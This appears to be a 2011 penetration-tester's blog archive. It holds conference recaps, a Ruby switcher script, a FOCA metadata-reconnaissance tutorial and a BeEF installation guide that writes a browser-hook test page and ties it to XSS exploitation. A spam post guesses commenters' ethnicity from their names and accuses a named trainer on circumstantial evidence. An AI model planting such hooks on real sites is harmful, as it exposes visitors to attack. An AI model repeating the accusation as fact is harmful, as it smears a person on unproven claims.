Saturday, 31 December 2011

Silent web app testing by example slides and experience

UPDATE: Just realised that Slideshare made the fonts look funny; use the "Download" option at the top to view the presentation properly as a PDF.

If you are interested you can now view and download the slides for "Silent web app testing by example" here.

I would like to take this opportunity to thank the awesome BerlinSides audience for all the kind words and support. I felt really overwhelmed by the good feedback, I almost hugged a guy when he told me something like: "I really liked your talk, it is amazing: The entry to BerlinSides is free and I am getting better talks here than in CCC". I think this was an exaggeration but thank you!!! That is motivation for the whole new year right there :).

I would also like to thank my buddy Gavin (who gave the excellent SE talk at BerlinSides) for letting me use his remote control which I believe made the presentation more natural.

Thanks also go to Aluc for having the patience to answer all my questions before and during BerlinSides :) and for paying many of the costs out of his own pocket.

The 16 owtf demos and slides will follow shortly as well as the source code release next week.

Happy new year everyone!

Friday, 2 December 2011

BruCon 2011 Lightning Talk winner slides, experience and some pics

I would like to use this opportunity to thank everybody that voted my lightning talk "Web app testing without attack traffic" as the "BruCon 2011 Lightning Talk winner".

I only had 5 minutes, so I had to cut many things I wanted to cover. For this reason, I have significantly expanded this talk (106 slides + good feedback from reviewers so far) and submitted it to BerlinSides.

The slides I used for BruCon are now posted here (I only changed the website URL to the new one).

I did not even know the Lightning Talks part of the conference was also a contest and was surprised you chose mine over internationally well-known speakers and the many great projects and ideas that were also presented (and that I really liked myself!):

- "Metasploit shellbag information gathering module" by Jason Haddix
- "Impersonating SSL" - SSL interception tool via "plausible invalid cert" by Chris John Riley.
- "Do not fear crypto" (TYPO3 vuln walk-through) by Chris John Riley
- "Digital death - a very quick version" by Robin Wood
- "Honeymail project" to track spam by Tomasz Miklas
- "Last year it was remote, now it's local!" by Wicked Clown (on windows priv escalation vuln)
- "Ostinato" (a packet capture / crafter) by Joke
- Joke gave another talk the following day too! (she and Chris John Riley were -I think- the only ones to give 2 talks, you rock!)
- "How (not) to pick up chicks at the BruCON Party" by Melisande
- "How to suck less at ...SQUIRRELS" by Matt Erasmus
- biosshadow presented too but I forgot the talk name; I think it was about password profiling
- "Bypassing endpoint protection" by Matt Summers
(Sorry if I forgot someone, it's been a while since September!)

From the BruCon 2011 security conference itself, I was waiting for the pictures and video to do one of my "all out, pictures or it did not happen" security conference blog posts, but no conference pictures were published and, unfortunately, most of the video was lost.

I will briefly say that for me, personally, the best talk/workshop of the conference was undoubtedly:
"The Web Application Hacking Toolchain" by Jason Haddix

In my opinion, many (but not all) of the other talks were too "high level"; Jason Haddix provided something practical that we can apply directly and explained his reasoning along the way. This is the kind of information sharing we need more of in the infosec community.

Thanks for the pic bioshadow!

Despite what I just said, the following non-technical talk was highly inspirational to me:
"You and your research" by Haroon Meer

From the rest, one of the best was obviously Dan Kaminsky with "Black Ops of TCP/IP 2011", and also Alex Hutton with "Why Information Risk Management Is Failing, Why That Matters to Security & What You Can Do About It". You can see a picture of them enjoying a Mojito here:
Thank you to the person that tweeted this :). Was it you Marisa?

Jimmy had an awesome T-shirt everyday:
Thanks for pic Tomasz!

And I found everybody very approachable and nice during the 1st but also the 2nd day after party:
Thanks for the pic Marc!

I was also impressed by the Mobile phones talk: "Smart Phones – The Weak Link in the Security Chain" by Nick Walker and Werner Nel. This was really good research and definitely a lot of work.

There were many other great talks and I also specially liked Chris Gates and Joe McCray with "Pentesting High Security Environments" and "Abusing Locality in Shared Web Hosting" by Nick Nikiforakis.

As usual I could not physically attend everything but from what I attended, that was the best in my opinion.

A full list of what each talk was about can be found here:

Wednesday, 19 October 2011

Test your SSL: TLSSLed v1.2 released!

I have decided to stop swearing when tools don't work and to instead fix them or implement my improvements and then send them to the tool author. The point is to give back to the community, since after all the community gave the tool to me for free first :).

As part of this initiative, while playing with TLSSLed on a weekend, I had a few ideas, implemented them and sent them to Raúl Siles, the tool author. He is a very capable guy: he made my contributions even better and was cool enough to add me to the credits :).

TLSSLed automates the blackbox tests for the "Testing for SSL-TLS" (OWASP-CM-001) entry in the OWASP Testing Guide. It is very simple to use and the results are easy to read. I highly recommend it.

You can see a detailed write-up on the new features and download the tool here or read more about it on Taddong's blog.

I originally saw the tool on the site and more precisely here. However, since Raúl maintains the tool, I would suggest downloading it from Taddong's site instead.

Friday, 7 October 2011

Backtrack 5 Shell Script to Change the Ruby Environment automatically

NOTE: I also posted this to the BeEF Project Wiki here

Some Backtrack 5 security tools need ruby 1.8 (e.g. whatweb) and others ruby 1.9.2 (e.g. BeEF). This script automates the switch.
By setting the ruby environment to the correct ruby version we can run all tools. This script aims to make this small task easier to do and in a more scripting-friendly way.
Installation instructions:
  1. copy-paste the code below into a file, ideally somewhere in your PATH
  2. chmod 700 # (obviously!)
IMPORTANT: You need to call this script with a ". " in front of it to alter your environment settings.
  1. . 1.8 ; /pentest/enumeration/web/whatweb/whatweb
  2. cd /pentest/web/beef ; . 1.9.2 ; ruby beef
If you try to start BeEF using the incorrect environment you should see an error message like this:
"Ruby version 1.8.7 is no longer supported. Please upgrade 1.9 or later."
If you ran the Backtrack 5 Installation Script then you would only need to run this script to run ruby 1.8 tools.

Source code to copy-paste:
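A minimal sketch of the switcher follows; the install paths under /opt are assumptions, so point them at wherever your ruby 1.8 and 1.9.2 actually live. Remember it has to be sourced with a leading ". " so it can modify the PATH of your current shell rather than a subshell's:

```shell
#!/bin/sh
# Switch the active ruby by rewriting PATH. Must be sourced:  . <this script> 1.8
RUBY_18_BIN="/opt/ruby1.8/bin"      # assumption: adjust to your ruby 1.8 bin dir
RUBY_192_BIN="/opt/ruby1.9.2/bin"   # assumption: adjust to your ruby 1.9.2 bin dir

RUBY_BIN=""
case "$1" in
  1.8)   RUBY_BIN="$RUBY_18_BIN" ;;
  1.9.2) RUBY_BIN="$RUBY_192_BIN" ;;
  *)     echo "Usage: . <this script> 1.8|1.9.2" ;;
esac

if [ -n "$RUBY_BIN" ]; then
  # Drop any previous ruby bin dirs so repeated calls do not grow PATH,
  # then prepend the chosen one:
  PATH=$(echo "$PATH" | tr ':' '\n' | grep -Fvx -e "$RUBY_18_BIN" -e "$RUBY_192_BIN" | paste -sd: -)
  PATH="$RUBY_BIN:$PATH"
  export PATH
  echo "PATH now prefers: $RUBY_BIN"
fi
```

Sourcing (". ") is what makes the PATH change stick in your current shell; executing the script normally would only change the environment of a short-lived subshell.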

Wednesday, 28 September 2011

Why All IT Departments Need to Monitor Internet Usage

Five years ago, using a software system to monitor Internet usage may have been seen in some quarters as the preserve of large companies, and not so much of a concern to SMBs.
Productivity loss, time wasted on non-work-related browsing and excessive use of video streaming are a few of the reasons why more and more IT departments are looking into Internet monitoring and filtering for their organizations.
Most managers will be familiar with walking into an office and seeing a member of staff scrambling to “minimize” their internet browser window because they were on Facebook, eBay, or checking their personal email! People conduct a large part of their social, financial and personal lives via the Internet, so it is understandable that, with unrestricted Internet access at work, people will be tempted to browse. Although some employees will do so for limited periods, not everyone restricts their browsing at work to a few minutes during the day.

The decision to monitor Internet usage may be driven simply by a need to reduce this non-productive time in the office, but sometimes, the security risks associated with unrestricted browsing can be far more significant.

Malicious hackers are always keen to exploit "back doors" into computer networks, which is why viruses and malware exist that target Facebook apps and web-based email accounts. IT departments sometimes invest large amounts of time and money in protecting core systems and email gateways, only to find that viruses enter the network due to unsuspecting users opening unsafe attachments in their personal email accounts or visiting compromised websites.

Internet monitoring software can help to protect less technical staff from Internet threats - pre-scanning for malicious websites and preventing access to anything that may compromise the network.

It is quite possible to monitor Internet usage and restrict it appropriately without taking truly draconian steps. Good Internet monitoring solutions allow settings to be configured to a precise degree, for example allowing a sensible level of personal use, perhaps restricted by time period or by quantity of downloaded data.

Once employees are informed that the company has begun to monitor Internet usage, they are likely to automatically cut down the time they spend browsing non-work-related sites. They will also notice that their Internet connection is actually much better, allowing them to get their work done much faster.

Widespread browsing within an organization can be a real drain on company bandwidth, especially when users are accessing media-rich websites such as Facebook and YouTube.

Companies should make it very clear to employees why they need to monitor Internet usage and introduce a written monitoring policy to detail how the monitoring is conducted, and what level of personal use is considered acceptable.

Although some companies may see monitoring Internet usage as intrusive, there are valid legal, security and productivity reasons why monitoring should take place. The good thing is that properly managed and configured web monitoring solutions can help to maintain a good balance between the needs of the organization and employees taking a break to check their email or update their social networking profile.

This guest post was provided by Ben Taylor on behalf of GFI Software Ltd. GFI is a leading software developer that provides a single source for network administrators to address their network security, content security and messaging needs. Read more on monitoring internet usage.

All product and company names herein may be trademarks of their respective owners.

Tuesday, 13 September 2011

Testing Web apps without attack traffic

I will be giving a lightning talk at Brucon next week. My goal is to give a quick overview on the vast amount of tests possible before you have permission to test a target. This is particularly useful if you are given a short test window but you are willing to put the extra effort to do as much as you can beforehand.

See you at Brucon!

Sunday, 21 August 2011

Unleashing the power of metadata with FOCA Free


The terrific guys at informática64 put together the FOCA tool (for mostly automated metadata extraction in the free version) quite a while ago and they just keep improving it continuously. The Pro version is just 100€ + VAT and you get a lesson from Chema Alonso along the way, so it is worth considering too :).

I recently heard on the Spanish version of the PaulDotCom podcast that the tool name "FOCA" ("Seal" in Spanish) comes from the guy who first implemented the tool at informática64. His name is "Fernando Oca" and his username was logically "Foca". This led to a lot of healthy jokes at informática64 and the tool name was inevitable :).

The version used in this tutorial is FOCA Free (the free version has significantly fewer options but it is still very useful). They are going to release version 3 soon (Spanish), so I might publish another tutorial in a few months, by when, they say, the tool will be significantly improved.


This is a Windows tool, so you just download it from here, install it (typical "next next finish" install) and run it. No secrets here :)

Basic usage

The first step when using FOCA is to choose your search type; you can choose "" or " filetype:doc", etc.

In this demonstration we will use and search for .doc documents only. Because Google is mostly a Linux/Mac shop (afaik) this yields few results, which is good for demonstration purposes:

When you have a bunch of sites, as I did in a recent test, I like to use: OR ..... If they are not very big, do not specify a filetype: this will return everything, including web pages, which you can later analyse for HTML comments, etc. too.

The next step is to download all documents, to do that just Right click / Download All:

This will download all indexed files locally. After the download completes we can extract the metadata from the downloaded files (Metadata / Extract all documents metadata):

Once the metadata is extracted we can review it:

The metadata identifies 3 potential users as well as 1 software package in use and an operating system.
Apparently all 3 users are using Mac OS at Google! :)

We can now correlate the metadata to get a per user, printer, etc view. We can do this as follows:

In the analysis we can see that all the metadata comes from the same user, who is using Mac OS and Microsoft Office 2008 for Mac OS. This information would be useful in a targeted client-side attack, because specific exploits could be sought for the versions in use by the client:

Now let's look at information from the field. What can you really find in a normal pen test?
A bunch of users, printers, folders, software and operating systems :)

When you look at the by-user metadata analysis you can see what software version each user is potentially running, and you get a nice icon to quickly identify each computer by username:

The servers and printers usually contain very interesting correlated information like for example which users had access to each printer or server.

It is a bit of a pain to extract the information out of FOCA Free (I suppose this is easier in the paid version :)) but you can at least browse the downloaded files and perhaps even run them through another metadata tool like exiftool. You can extract the information of each record (one by one, manually) by right-clicking on it:

On a default Windows 7 installation FOCA downloads the files to:
C:\Users\<windows 7 user>\AppData\Local\Temp

You can tell apart the FOCA files from the rest quite accurately based on the download timestamp.
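If you go the exiftool route, a batch run over the downloaded documents could look like the sketch below. It assumes exiftool is installed and that you have copied the FOCA downloads out of the Temp folder to a placeholder directory:

```shell
#!/bin/sh
# Batch-extract common authorship metadata from FOCA's downloaded documents.
# DOCS is a placeholder: copy the files out of FOCA's Temp folder first.
DOCS="${1:-./foca-downloads}"

# Pick up the office-style documents FOCA fetched and dump a few
# interesting metadata fields into one text file for review:
find "$DOCS" -maxdepth 1 \( -name '*.doc' -o -name '*.xls' \
  -o -name '*.ppt' -o -name '*.pdf' \) \
  -exec exiftool -Author -LastModifiedBy -Creator -Software {} + > foca_metadata.txt

# Review the collected fields afterwards, e.g.:
#   grep -i author foca_metadata.txt
```

This gets you roughly the per-document raw data that FOCA correlates for you, in a form you can grep and post-process.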

A minor issue, particularly when many domains are used at once, is that files like index.php will be created as "index(1).php", "index(2).php", etc. Then it takes a bit of work to figure out which index.php belongs to which domain.

Better results can be achieved with a tool like wget or HTTrack for website crawling and HTML comment and JavaScript code analysis.

The true power of FOCA comes from the automated "even my grandma can do it" metadata analysis, including correlation by user, server and printer.

Monday, 8 August 2011

Red Meat Series: Installing BeEF on Windows Systems

I also posted this guide as a wiki entry on the BeEF project page here.

Installing BeEF on a Windows system might be a bit confusing for some users: there is no typical Windows installer where you click "Next, Next, Finish" and everything works. You need to perform a series of manual steps to get BeEF to work, and there can be some strange problems along the way.

This article tries to explain one way of doing this which worked for me.

The first step is to install Ruby. You can download Ruby for Windows from this URL:

You can check the hashes in Windows using a tool like for example Hash Tab (which adds a tab to the file properties showing you the hashes).

In addition to verifying the hashes, before you run any executable you download from the Internet it is a good idea to run it through VirusTotal first. This will scan the executable with more than 40 antivirus engines. This is, however, not a guarantee that the program is not malicious, and it can in fact be bypassed (using msfencode, for example). When no antivirus engine finds a problem with the downloaded file, that gives you a higher degree of confidence that the file is hopefully safe.
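For the hash check itself, a quick sketch (sha256sum from Linux or Cygwin; on plain Windows, certutil -hashfile <file> SHA256 does the same job; the installer filename below is just an example, use whatever you actually downloaded):

```shell
# Compute the SHA-256 of the download and compare it by eye with the
# value published on the download page. The filename is an example.
sha256sum rubyinstaller-1.9.2-p180.exe
```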

Once we are happy with the file hashes and the virus analysis we can move on and install this program. These steps are skipped later on other executables for brevity. I installed Ruby ticking all the boxes:

 After installing Ruby, you need to download the SQLite dll from this URL.

Now extract the SQLite zip file into the Ruby192\bin folder:

Unless you already have one handy, we will also need to download and install a good SVN client for Windows, for example Tortoise SVN:

 I marked everything as "install all the features in the local drive" during setup (although this is obviously not necessary, depends on what else you plan to do with SVN):

 You will have to reboot your system after installing Tortoise SVN. Once you reboot you can get the latest BeEF version by performing an SVN export (right click on a blank space in the BeEF folder / Tortoise SVN / Export):

That will present you the following screen, where you can put in the BeEF trunk URL:

 When you click OK you should see something like this (files are copied from the SVN URL to your hard drive):

Now, using the Windows command line (I like Start / Run / type: cmd + Enter) you just need to do ruby install in the BeEF installation folder, in this example E:\BeEF. You can choose to install the ruby gems automatically or manually:

 If the gems installation goes ok, you should see something like this:

But you might get a missing win32 console gem error too:
no such file to load -- Win32/Console/ANSI (LoadError)

This error is easy to solve: just do gem install win32console:

You could also get this error (or similar "requires installed build tools" message):
The 'json' native gem requires installed build tools

In this case we need to install the Development Kit. You can download it from this URL. There are great instructions on how to install the kit here (what comes next is the result of directly following the instructions in the Development Kit wiki). First we need to download it:

The file is a self-extracting compressed file so you just need to extract it in a handy place like C:\DevKit, for example:

Now we need to run "ruby dk.rb init" to generate the "config.yml" file to be used later:

We can open the file to make sure that it found where Ruby was installed:

Now a few other steps:

  1. ruby dk.rb review (checks things are ok)
  2. ruby dk.rb install (creates DevKit hooks)
  3. gem install rdiscount --platform=ruby (you should see the message "Temporarily enhancing PATH to include DevKit...")
  4. ruby -rubygems -e "require 'rdiscount'; puts RDiscount.new('**Hello RubyInstaller**').to_html" (just to check the gem was installed and works correctly)
In one picture:

Now that DevKit is installed we should have no problem installing that missing json gem:

Now we can check the installation: just do "ruby beef" to start BeEF. Of course you will need your Windows Firewall to allow that application :).

Now, do not be lame and stare at the GUI here wondering what the password is:

The password is in the configuration file at <beef folder>\extensions\admin_ui\config.yaml. You can see that the default username and password are beef / beef. That does not mean those are the credentials you should use to log in: it really means that everybody knows those credentials, and if you don't change them your BeEF server could be compromised:

Therefore what you should do is to change those credentials and pick a different username and a very long and complex password:

After saving the file above, you will get the following error message when you try to log in: "invalid username or password". This is because when BeEF was started the previous configuration file was read, so the old credentials are still in use:

What we need to do here is to stop the BeEF server (via Control + C) and then start it again. That will make BeEF read the new configuration file so the new credentials will now be accepted:

 The credentials work this time and we are presented with the BeEF server home page:

How do we know if BeEF is working? We need some client browser to connect. Just copy the hook URL ( will work from the same computer).

Now you need a web server: a place where you can create a web page that contains a call to the JavaScript hook. You could also exploit an XSS vulnerability on an internet server to get around this but that will be covered later in the Red Meat Series :). In this example, we will use a typical Apache installation where a simple index.html file is created:

The most important bit of the screenshot above is the script part: only that part of the page contains the hook to BeEF. That is the kind of JavaScript you would use to exploit an XSS vulnerability with BeEF.
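As a sketch, the whole page can be dropped into place from a shell. Two assumptions here: /var/www as the Apache docroot (a common default, adjust to yours), and the hook path in the script tag, which is hypothetical — copy the exact hook URL that your own BeEF server gives you:

```shell
# Create a minimal hooked page in the web server's docroot.
# /var/www is an assumed Apache docroot; the hook URL is an assumption,
# replace it with the hook URL from your BeEF server.
cat > /var/www/index.html <<'EOF'
<html>
  <head>
    <title>Nothing to see here</title>
    <!-- This script tag is the only part that matters: the BeEF hook -->
    <script src=""></script>
  </head>
  <body>
    <p>Just a normal web page :)</p>
  </body>
</html>
EOF
```

The page itself can say anything at all; the visitor only sees normal content while the script tag does the work in the background.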

When a user browses to this site, they are presented with a normal web page. In the background the script connects back to the BeEF server:

The BeEF server receives the new connection and from there different client side commands and attacks are possible via the BeEF framework:

At this point the installation has been verified to be successful. Enjoy and do not be evil :).

Tuesday, 2 August 2011

Blog Spam Analysis Series: CISSP Spam surprise

Update 08/08/2011: Added link to further evidence of Shon Harris spamming via blog comments from ittraining blog at the bottom of the post.

I have maintained this blog for some time. I appreciate comments but sometimes there is spam that unfortunately gets in:

In particular, I was interested in the CISSP spam: the CISSP post is one of the most popular on this blog and perhaps that is why spam tends to end up there.

In the screenshot above you may notice that the CISSP spam so far comes from three spammers: Gowshika, Mithun and Nitheesh. Let's take a look at them:

Gowshika's information:
- Spam messages to my blog to date: 1 (100% CISSP Spam)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August 2011 when the spam arrives
- Potentially an Indian female according to minor research below if the name is really her real name.
- Spam link goes to:

Although I did not know this initially, a simple Google search reveals that Gowshika is an Indian name:

Would you put your name in your profile if you were a spammer? I suppose I would not :). That being said we have to admit that Gowshika was smart enough to avoid writing down her surname, email address and phone number :). Gowshika could also be the name of the spammer's girlfriend or whatever but this somehow points to India anyway.

I was going to go with the rough rule of "if it finishes in 'a' it is possibly a girl" but I actually double checked that Gowshika is truly a female name with a couple more Google searches like "Gowshika male" and "Gowshika female".

Next spammer:
Mithun's information:
- Spam messages to my blog to date: 2 (100% CISSP spam)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August 2011 when the spam arrives, previous spam link sent on 29/6/2011.
- Potentially an Indian male according to minor research below if the name is really his real name.
- Spam links go to:

There is a famous Indian actor as the first Google result (so possibly: Indian and male):

Next spammer:

Nitheesh's information:
- Spam messages to my blog to date: 2 (100% CISSP spam, 1 message went to this post but the spam link still pointed to a CISSP site)
- No blog, only a blogger profile: Probably too busy spamming people to keep up a blog too ;)
- Profile created in May and alive until at least August, when I could still open the profile (02/08/2011). Both spam links were sent on 21/6/2011.
- Potentially an Indian male according to minor research below if the name is really his real name.
- Both spam links go to:

A simple Google search reveals this is an Indian male name:

At this point the state of the investigation is as follows:
- 3 spammers for all CISSP spam links to date
- Potentially 2 Indian males and 1 Indian female
- 100% of CISSP spammers were potentially Indian
- 100% of the CISSP links go to
- Spam links:

I was thinking that, despite looking very similar if not identical to Shon Harris' main CISSP domain for selling CISSP materials, this site would probably be some form of malware site (seriously, that was my first reaction). However, I was wrong: appears to be a legitimate site and even Shon Harris' LinkedIn profile links to it!

It seems unlikely to me that Indian people would bother to post CISSP spam comments in my blog for the lulz alone. You do not need to be very smart to realise that the business model points to Shon Harris outsourcing spammers in India to increase sales of her CISSP training materials.

Further, there is evidence gathered by that was previously spamming via email too, both in 2008 and in 2010.

Not only that, but Jericho from actually confronted Shon Harris directly about it in 2010, and Shon never mentioned, in a single line of her emails (yes, I read them all), that she was not sending spam. Ironically, the conversation started because Shon had problems unsubscribing from the mailing list :).

There are hints of this in the emails exchanged between Jericho and Shon, but I wondered this myself too as I was investigating the spam in my blog: what is the value of the CISSP code of ethics if the top authority in CISSP training materials, and a CISSP herself, Shon Harris, violates them like this?

One of the clauses in the code of ethics is literally: "Act honorably, honestly, justly, responsibly, and legally". A CISSP, or anybody with some basic ethics for that matter, should not be sending spam. Matters get worse when you are not only a CISSP but also training other future CISSPs; most people would expect the trainer to lead by example.

Finally, I would like to mention that the following looks unprofessional too:

# curl -A CISSP -i|head -3
HTTP/1.1 200 OK
Date: Tue, xx Aug 2011 xx:xx:xx GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ PHP/5.2.9
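If you only care about the banner line, the same check can be narrowed to a one-liner (the URL below is a placeholder):

```shell
# Print only the Server banner from an HTTP HEAD request.
# http://example.com/ is a placeholder URL.
curl -sI -A CISSP http://example.com/ | tr -d '\r' | awk -F': ' '/^Server:/ {print $2}'
```

An ancient Apache/OpenSSL banner like the one above is a pretty loud hint that the box is not being patched.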

Pro tip: Do not spam security folks ;)

Update 08/08/2011: Further evidence of this activity from the ittrainingblog (04/08/2010):
"FUNNY UPDATE: Check out the comment spam we got from Shon Harris' blog, I actually approved it. Im interested to know what spammy SEO company she has marketing her site, Shon has far too strong a name in the industry for that."